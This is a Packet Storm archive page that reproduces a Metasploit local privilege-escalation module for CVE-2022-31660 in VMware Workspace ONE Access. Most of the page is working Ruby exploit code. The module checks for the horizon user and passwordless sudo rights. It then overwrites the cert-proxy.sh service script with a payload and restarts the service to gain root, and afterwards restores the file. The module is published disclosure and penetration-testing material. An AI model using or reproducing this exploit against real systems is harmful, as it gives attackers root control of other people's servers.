exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VMware Workspace ONE Access Privilege Escalation

VMware Workspace ONE Access Privilege Escalation
Posted Aug 4, 2022
Authored by Spencer McIntyre | Site metasploit.com

VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. The service control is permitted via the sudo configuration without a password.

tags | exploit, root
advisories | CVE-2022-31660
SHA-256 | 84c0696cc53d2e4bd749c04b694cbb8ae3676b266a9d0e92ecb77d88dc2558c3

VMware Workspace ONE Access Privilege Escalation

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking

include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Unix

TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze

def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'VMware Workspace ONE Access CVE-2022-31660',
'Description' => %q{
VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges
to those of the root user by modifying a file and then restarting the vmware-certproxy service which
invokes it. The service control is permitted via the sudo configuration without a password.
},
'License' => MSF_LICENSE,
'Author' => [
'Spencer McIntyre'
],
'Platform' => [ 'linux', 'unix' ],
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [
[ 'Automatic', {} ],
],
'DefaultOptions' => {
'PrependFork' => true,
'MeterpreterTryToFork' => true
},
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2022-31660' ],
[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]
],
'DisclosureDate' => '2022-08-02',
'Notes' => {
# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service
# is disabled by default though.
'Stability' => [CRASH_SERVICE_DOWN],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
}
)
)
end

def certproxy_service
# this script's location depends on the version, so find it.
return @certproxy_service if @certproxy_service

@certproxy_service = [
'/usr/local/horizon/scripts/certproxyService.sh',
'/opt/vmware/certproxy/bin/certproxyService.sh'
].find { |path| file?(path) }

vprint_status("Found service control script at: #{@certproxy_service}") if @certproxy_service
@certproxy_service
end

def sudo(arguments)
cmd_exec("sudo --non-interactive #{arguments}")
end

def check
unless whoami == 'horizon'
return CheckCode::Safe('Not running as the horizon user.')
end

token = Rex::Text.rand_text_alpha(10)
unless sudo("--list '#{certproxy_service}' && echo #{token}").include?(token)
return CheckCode::Safe('Cannot invoke the service control script with sudo.')
end

unless writable?(TARGET_FILE)
return CheckCode::Safe('Cannot write to the service file.')
end

CheckCode::Appears
end

def exploit
# backup the original permissions and contents
print_status('Backing up the original file...')
@backup = {
stat: stat(TARGET_FILE),
contents: read_file(TARGET_FILE)
}

if payload.arch.first == ARCH_CMD
payload_data = "#!/bin/bash\n#{payload.encoded}"
else
payload_data = generate_payload_exe
end
upload_and_chmodx(TARGET_FILE, payload_data)
print_status('Triggering the payload...')
sudo("--background #{certproxy_service} restart")
end

def cleanup
return unless @backup

print_status('Restoring file contents...')
file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it
write_file(TARGET_FILE, @backup[:contents])
print_status('Restoring file permissions...')
chmod(TARGET_FILE, @backup[:stat].mode & 0o777)
end
end
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close